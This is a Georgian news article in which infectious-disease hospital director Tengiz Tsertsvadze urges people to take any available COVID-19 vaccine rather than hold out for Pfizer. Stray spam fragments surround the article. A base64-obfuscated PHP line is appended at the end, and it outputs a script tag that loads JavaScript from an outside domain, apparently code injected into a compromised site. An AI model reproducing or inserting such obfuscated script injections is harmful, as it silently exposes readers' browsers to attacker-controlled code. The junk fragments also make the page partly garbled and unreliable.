global distribution
გარე ავეჯი
თბილისის ინფექციური საავადმყოფოს დირექტორი თენგიზ ცერცვაძე აცხადებს, რომ უნდა ავიცრათ ყველა იმ ვაქცინით, რომელიც დღეს გვაქვს. მისი თქმით, ვაქცინებს შორის განსხვავება არ არის იმდენად დიდი და მნიშვნელოვანი, რამდენიც ამ განსხვავებული ვაქცინის მოლოდინში დაკარგული დრო. ინფორმაციას 1tv.ge ავრცელებს.
 
„უცხოეთში – წარმატებულ ქვეყნებში, ევროკავშირში, ამერიკაში პოპულარულია ასეთი გამოთქმა – ვაქცინებს შორის განსხვავება არ არის იმდენად დიდი და მნიშვნელოვანი, რამდენიც ამ განსხვავებული ვაქცინის მოლოდინში დაკარგული დრო. ყველა თანხმდება იმაზე, რომ უნდა ავიცრათ ყველა იმ ვაქცინით, რომელიც დღეს გვაქვს. დღეს თუ გვექნება არჩევანის საშუალება, ვთქვათ, იგივე ჩინურს, „ასტრაზენეკასა“ და „ფაიზერს“ შორის, მაშინ შესაძლებელია არჩევანი, მაგრამ უნდა ვიცოდეთ, რომ ეს არჩევანი ყველას ვერ შეხვდება და ამისთვისაც მზად უნდა ვიყოთ“, – აცხადებს ცერცვაძე საქართველოს პირველ არხთან.
 
ამასთან, ინფექციონისტს მიაჩნია, რომ ყველა ტიპის ვაქცინას გამოუჩნდება მსურველი.
 
„ყველას გამოუჩნდება თავისი მსურველი. მე არ ვფიქრობ, რომ ჩინურ ვაქცინას შესაძლოა, ცოტა ნაკლები მსურველი ეყოლოს, ვიდრე „ფაიზერს“. ჩინური ვაქცინა უფრო უსაფრთხოა. ასეთი ინფორმაცია არსებობს. ის საკმარისად ეფექტიანია. იცავს მძიმე და სასიკვდილო ფორმებიდან და საბოლოო ჯამში, როცა წლები გავა და ვაქცინები შეფასდება, ჯერ კიდევ არავინ იცის, როგორ დალაგდება მათი რეიტინგი, რომელი ვაქცინა იქნება უფრო ეფექტიანი. გაგებით უნდა მოვეკიდოთ, ძალიან გამაღიზიანებელია, როცა „ფეისბუქზე“ ადამიანები, რომლებსაც ხელი არ გაუნძრევიათ იმისთვის, რომ გამკლავებოდნენ ამ პანდემიას, ხელი არ შეუშველებიათ ჯანდაცვისთვის ან ქვეყნის საზოგადოებისთვის, რომ ეს ვაქცინები მიგვეღო, გამოდიან და უაპელაციოდ აცხადებენ, მე ავიცრები მხოლოდ „ფაიზერით“, სხვა ვაქცინა არ მინდაო.
 
მე აუცილებლად „ფაიზერი“ მინდა – ეს მაგონებს იმას, საქართველოს მოქალაქეები რომ გამოვიდნენ და თქვან, ყველას გვინდა თითო ავტომობილი და აუცილებლად „მერსედესის“ ბოლო გამოშვებაო. ეს ხომ არარეალურია, არა მარტო საქართველოსთვის, არამედ მსოფლიოსთვის. ყველას უნდა „მერსედესის“ ბოლო გამოშვება, ყველას ურჩევნია, მაგრამ თვით გერმანიაშიც, სადაც „მერსედესის“ ქარხანაა და რომელიც უმდიდრესი სახელმწიფოა ევროპაში, ვერ აძლევს ყველა თავს უფლებას, „მერსედესის“ ბოლო მარკის მანქანით იაროს. ამიტომ რეალისტები უნდა ვიყოთ და გამოვიყენოთ ის ვაქცინა, რომელიც ხელმისაწვდომია და რომელიც ასევე საკმარისად უზრუნველყოფს ჩვენი სიცოცხლის დაცვას“, – განუცხადა საქართველოს პირველ არხს თენგიზ ცერცვაძემ.
1120
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");